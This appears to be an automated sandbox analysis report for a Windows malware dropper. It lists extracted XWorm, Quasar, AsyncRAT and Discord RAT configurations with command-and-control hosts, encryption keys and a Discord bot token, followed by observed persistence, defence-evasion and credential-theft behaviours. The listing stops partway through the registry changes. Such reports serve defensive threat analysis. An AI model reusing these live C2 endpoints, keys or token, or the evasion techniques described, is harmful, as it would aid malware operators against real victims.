Resubmissions
08-01-2025 13:31
250108-qsdnes1qb1 1017-12-2024 13:35
241217-qv6rzs1nhp 1015-11-2024 19:06
241115-xr6q5szdnf 1014-11-2024 23:35
241114-3lfknavfqg 1014-11-2024 23:26
241114-3eysnavfje 1014-11-2024 23:12
241114-26znlavdqq 10Analysis
-
max time kernel
900s -
max time network
901s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-01-2025 13:31
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win11-20241007-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Extracted
xworm
3.1
profile-indians.gl.at.ply.gg:39017
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
discordrat
-
discord_token
MTMxNTQxMDg0NDg3NTQ4OTI4MA.Gx5ptK.HY1OYsjGMP1MsOoyD2E7T9pCvkfHTdOPozmb_c
-
server_id
1315411300192616569
Extracted
quasar
1.4.1
Stinky
ef3243fsert34.ddns.net:47820
anthonyngati.ddns.net:3872
60cba0a9-0a63-450c-9567-57ef0e3c2e24
-
encryption_key
7A23123B6E1E0CCDB27477C6C7654C7BE2FEDE54
-
install_name
sru.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
xml
-
subdirectory
sru
Extracted
quasar
1.4.1
Nigga
yzs-42879.portmap.host:42879
57d72303-b5e9-46aa-8cc4-9690809c1a9e
-
encryption_key
F1EBDB1862062F9265C0B5AC4D02C76D026534D0
-
install_name
RuntimeBroker.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
Temp
Extracted
asyncrat
0.5.7B
Default
3.70.228.168:555
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Windows Client
148.163.102.170:4782
4c18e02c-7c39-4a5e-bbef-16fe13828101
-
encryption_key
73B0A3AC50C78E243EA93BF9E60C9BC63D63CA26
-
install_name
Sever Startup.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Startup
-
subdirectory
Windows Startup
Extracted
quasar
1.4.0.0
Office
85.192.29.60:5173
QAPB6w0UbYXMvQdKRF
-
encryption_key
pxC3g4rfVijQxK1hMGwM
-
install_name
csrss.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
NET framework
-
subdirectory
SubDir
Signatures
-
Asyncrat family
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x001b00000002aba9-113.dat family_xworm behavioral1/memory/2980-135-0x0000000000320000-0x0000000000334000-memory.dmp family_xworm -
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Quasar family
-
Quasar payload 48 IoCs
resource yara_rule behavioral1/files/0x0004000000000691-1189.dat family_quasar behavioral1/memory/3172-1216-0x00000000004F0000-0x0000000000814000-memory.dmp family_quasar behavioral1/files/0x000600000000f4c6-1221.dat family_quasar behavioral1/memory/3504-1242-0x0000000000030000-0x0000000000354000-memory.dmp family_quasar behavioral1/memory/1412-1323-0x0000000000740000-0x0000000000A64000-memory.dmp family_quasar behavioral1/memory/4712-1326-0x0000000000300000-0x0000000000624000-memory.dmp family_quasar behavioral1/memory/704-1538-0x0000000000D20000-0x0000000001044000-memory.dmp family_quasar behavioral1/memory/828-1560-0x0000000000570000-0x0000000000894000-memory.dmp family_quasar behavioral1/memory/4200-1754-0x0000000000500000-0x0000000000824000-memory.dmp family_quasar behavioral1/memory/900-1777-0x0000000000700000-0x0000000000A24000-memory.dmp family_quasar behavioral1/memory/4200-1991-0x0000000000C70000-0x0000000000F94000-memory.dmp family_quasar behavioral1/memory/1332-2015-0x0000000000390000-0x00000000006B4000-memory.dmp family_quasar behavioral1/memory/3240-2241-0x0000000000490000-0x00000000007B4000-memory.dmp family_quasar behavioral1/memory/4896-2246-0x0000000000140000-0x0000000000464000-memory.dmp family_quasar behavioral1/memory/1616-2425-0x0000000000680000-0x00000000009A4000-memory.dmp family_quasar behavioral1/memory/2216-2429-0x0000000000B40000-0x0000000000E64000-memory.dmp family_quasar behavioral1/memory/4408-2648-0x0000000000730000-0x0000000000A54000-memory.dmp family_quasar behavioral1/memory/1860-2684-0x0000000000CF0000-0x0000000001014000-memory.dmp family_quasar behavioral1/memory/3132-3212-0x0000000000400000-0x0000000000724000-memory.dmp family_quasar behavioral1/memory/2796-3356-0x00000000009D0000-0x0000000000CF4000-memory.dmp family_quasar behavioral1/memory/772-3372-0x0000000000C70000-0x0000000000F94000-memory.dmp family_quasar behavioral1/memory/1008-4205-0x0000000000E50000-0x0000000001174000-memory.dmp family_quasar behavioral1/memory/2160-4904-0x0000000000FB0000-0x00000000012D4000-memory.dmp family_quasar behavioral1/memory/3176-5333-0x0000000000CE0000-0x0000000001004000-memory.dmp family_quasar behavioral1/memory/2412-6138-0x0000000000610000-0x0000000000934000-memory.dmp family_quasar behavioral1/memory/2264-7119-0x0000000000CB0000-0x0000000000FD4000-memory.dmp family_quasar behavioral1/memory/4628-7247-0x0000000000B20000-0x0000000000E44000-memory.dmp family_quasar behavioral1/memory/3220-7367-0x0000000000DC0000-0x00000000010E4000-memory.dmp family_quasar behavioral1/memory/3916-7625-0x0000000000B70000-0x0000000000E94000-memory.dmp family_quasar behavioral1/memory/3136-7869-0x0000000000DB0000-0x00000000010D4000-memory.dmp family_quasar behavioral1/memory/852-7885-0x00000000001A0000-0x00000000004C4000-memory.dmp family_quasar behavioral1/memory/3120-8710-0x0000000000FF0000-0x0000000001314000-memory.dmp family_quasar behavioral1/memory/1804-9113-0x0000000000EB0000-0x00000000011D4000-memory.dmp family_quasar behavioral1/memory/3100-10102-0x0000000000490000-0x00000000007B4000-memory.dmp family_quasar behavioral1/memory/1460-10197-0x00000000005F0000-0x0000000000914000-memory.dmp family_quasar behavioral1/memory/1396-10211-0x0000000000550000-0x0000000000874000-memory.dmp family_quasar behavioral1/memory/2796-10439-0x0000000000180000-0x00000000004A4000-memory.dmp family_quasar behavioral1/memory/4692-10695-0x0000000000A20000-0x0000000000D44000-memory.dmp family_quasar behavioral1/memory/3136-11424-0x0000000000520000-0x0000000000844000-memory.dmp family_quasar behavioral1/memory/2256-11667-0x0000000000DF0000-0x0000000001114000-memory.dmp family_quasar behavioral1/files/0x0005000000025cbf-11701.dat family_quasar behavioral1/memory/3480-11750-0x00000000001D0000-0x00000000004F4000-memory.dmp family_quasar behavioral1/files/0x0003000000025cc3-11788.dat family_quasar behavioral1/memory/1184-11802-0x0000000000640000-0x000000000068E000-memory.dmp family_quasar behavioral1/memory/3580-11848-0x0000000000CB0000-0x0000000000FD4000-memory.dmp family_quasar behavioral1/memory/1652-11981-0x0000000000460000-0x0000000000784000-memory.dmp family_quasar behavioral1/memory/4768-12274-0x0000000000710000-0x0000000000A34000-memory.dmp family_quasar behavioral1/memory/2488-12288-0x00000000000F0000-0x0000000000414000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3712 created 632 3712 powershell.EXE 5 -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2492 powershell.exe 5048 powershell.exe 3712 powershell.EXE -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1412 netsh.exe 4716 netsh.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2112 chrome.exe 656 chrome.exe 564 msedge.exe 5040 msedge.exe 4712 msedge.exe 3932 msedge.exe 2056 chrome.exe 2240 chrome.exe 4304 msedge.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Drops startup file 9 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ec1d783eda90ea4f1a73218af4fd58aa.exe dlscord.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ec1d783eda90ea4f1a73218af4fd58aa.exe dlscord.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk Bloxflip%20Predictor.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe Process not Found File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe Process not Found File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe conhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4a87b5397a2736773782f50e108b2da4.exe conhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.lnk Process not Found File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe Process not Found -
Executes dropped EXE 64 IoCs
pid Process 2640 Security.exe 2980 $77Security.exe 3140 Install.exe 4012 $77Security.exe 4596 client.exe 2480 444.exe 2088 conhost.exe 1860 cli.exe 2752 $77Security.exe 3504 RuntimeBroker.exe 4712 RuntimeBroker.exe 1412 sru.exe 704 sru.exe 828 RuntimeBroker.exe 2032 cnct.exe 4200 sru.exe 900 RuntimeBroker.exe 2516 dlscord.exe 4200 sru.exe 1332 RuntimeBroker.exe 3240 sru.exe 4896 RuntimeBroker.exe 1616 RuntimeBroker.exe 2216 sru.exe 5028 $77Security.exe 4408 RuntimeBroker.exe 1860 sru.exe 3320 RuntimeBroker.exe 3968 sru.exe 408 Kerish_Doctor_2017.exe 2216 RuntimeBroker.exe 1988 Kerish_Doctor_2017.tmp 3700 sru.exe 4720 RuntimeBroker.exe 3804 sru.exe 3132 RuntimeBroker.exe 2112 sru.exe 920 $77Security.exe 2796 RuntimeBroker.exe 772 sru.exe 4940 RuntimeBroker.exe 4048 sru.exe 2872 sru.exe 2896 RuntimeBroker.exe 3176 RuntimeBroker.exe 4720 sru.exe 2180 RuntimeBroker.exe 1464 sru.exe 2856 RuntimeBroker.exe 4808 sru.exe 4492 Tutorial.exe 4672 PsExec64.exe 3168 $77Security.exe 1008 RuntimeBroker.exe 3384 sru.exe 3528 RuntimeBroker.exe 1880 sru.exe 4084 RuntimeBroker.exe 224 sru.exe 3132 main1.exe 3452 XClient.exe 2648 RuntimeBroker.exe 2160 sru.exe 1740 RuntimeBroker.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 2 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe -
Loads dropped DLL 44 IoCs
pid Process 3172 Client-built.exe 1988 Kerish_Doctor_2017.tmp 1988 Kerish_Doctor_2017.tmp 3476 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe 3132 main1.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77Security = "C:\\Users\\Admin\\AppData\\Roaming\\$77Security.exe" $77Security.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ec1d783eda90ea4f1a73218af4fd58aa = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dlscord.exe\" .." dlscord.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" CrSpoof.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .." conhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\4a87b5397a2736773782f50e108b2da4 = "\"C:\\Users\\Admin\\AppData\\Roaming\\conhost.exe\" .." conhost.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\ec1d783eda90ea4f1a73218af4fd58aa = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dlscord.exe\" .." dlscord.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Windows\\Bloxflip Predictor.exe" Bloxflip%20Predictor.exe Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows2 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Windows.URL" Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 271 discord.com 1 raw.githubusercontent.com 20 raw.githubusercontent.com 65 raw.githubusercontent.com 68 raw.githubusercontent.com 254 raw.githubusercontent.com 255 raw.githubusercontent.com 270 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 86 ip-api.com 260 ip-api.com -
Drops autorun.inf file 1 TTPs 8 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created D:\autorun.inf dlscord.exe File created F:\autorun.inf dlscord.exe File created C:\autorun.inf conhost.exe File opened for modification C:\autorun.inf conhost.exe File created D:\autorun.inf conhost.exe File created F:\autorun.inf conhost.exe File opened for modification F:\autorun.inf conhost.exe File created C:\autorun.inf dlscord.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\System32\Tasks\Windows Startup svchost.exe File opened for modification C:\Windows\system32\sru Client-built.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe Process not Found File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File created C:\Windows\system32\sru\sru.exe Client-built.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru\sru.exe sru.exe File opened for modification C:\Windows\system32\sru sru.exe File opened for modification C:\Windows\system32\sru sru.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3712 set thread context of 1540 3712 powershell.EXE 102 PID 4492 set thread context of 4820 4492 Tutorial.exe 332 -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Bloxflip Predictor.exe Bloxflip%20Predictor.exe File opened for modification C:\Windows\Bloxflip Predictor.exe Process not Found -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000e000000025bf7-4475.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 21 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cnct.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2017.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Tutorial.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 444.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language XClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cli.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dlscord.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_regbrowsers.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Kerish_Doctor_2017.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bloxflip%20Predictor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Process not Found Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1224 PING.EXE 2920 PING.EXE 4492 PING.EXE 1656 PING.EXE 4200 PING.EXE 3700 PING.EXE 4612 PING.EXE 4332 PING.EXE 4808 PING.EXE 3784 PING.EXE 1448 Process not Found 5028 PING.EXE 1600 PING.EXE 4020 PING.EXE 872 PING.EXE 4452 PING.EXE 4540 PING.EXE 3984 PING.EXE 1768 PING.EXE 5012 PING.EXE 1396 PING.EXE 2440 PING.EXE 4304 PING.EXE 3616 PING.EXE 3228 PING.EXE 4184 PING.EXE 1056 PING.EXE 764 PING.EXE 1012 PING.EXE 2032 PING.EXE 3800 PING.EXE 952 PING.EXE 1472 PING.EXE 4672 PING.EXE 2216 PING.EXE 992 PING.EXE 4816 PING.EXE 1972 PING.EXE 3528 PING.EXE 4536 PING.EXE 1064 PING.EXE 2260 PING.EXE 3664 PING.EXE 952 PING.EXE 1608 PING.EXE 3780 PING.EXE 5052 PING.EXE 1876 PING.EXE 1508 PING.EXE 2772 PING.EXE 1056 PING.EXE 1488 PING.EXE 5056 PING.EXE 3580 PING.EXE 4644 PING.EXE 232 PING.EXE 3496 PING.EXE 1880 Process not Found 4688 PING.EXE 956 PING.EXE 2100 PING.EXE 3112 Process not Found 652 PING.EXE 4020 PING.EXE -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3372 timeout.exe -
Enumerates system info in registry 2 TTPs 10 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Kills process with taskkill 2 IoCs
pid Process 4712 taskkill.exe 5004 taskkill.exe -
Modifies data under HKEY_USERS 58 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 08 Jan 2025 13:32:47 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs 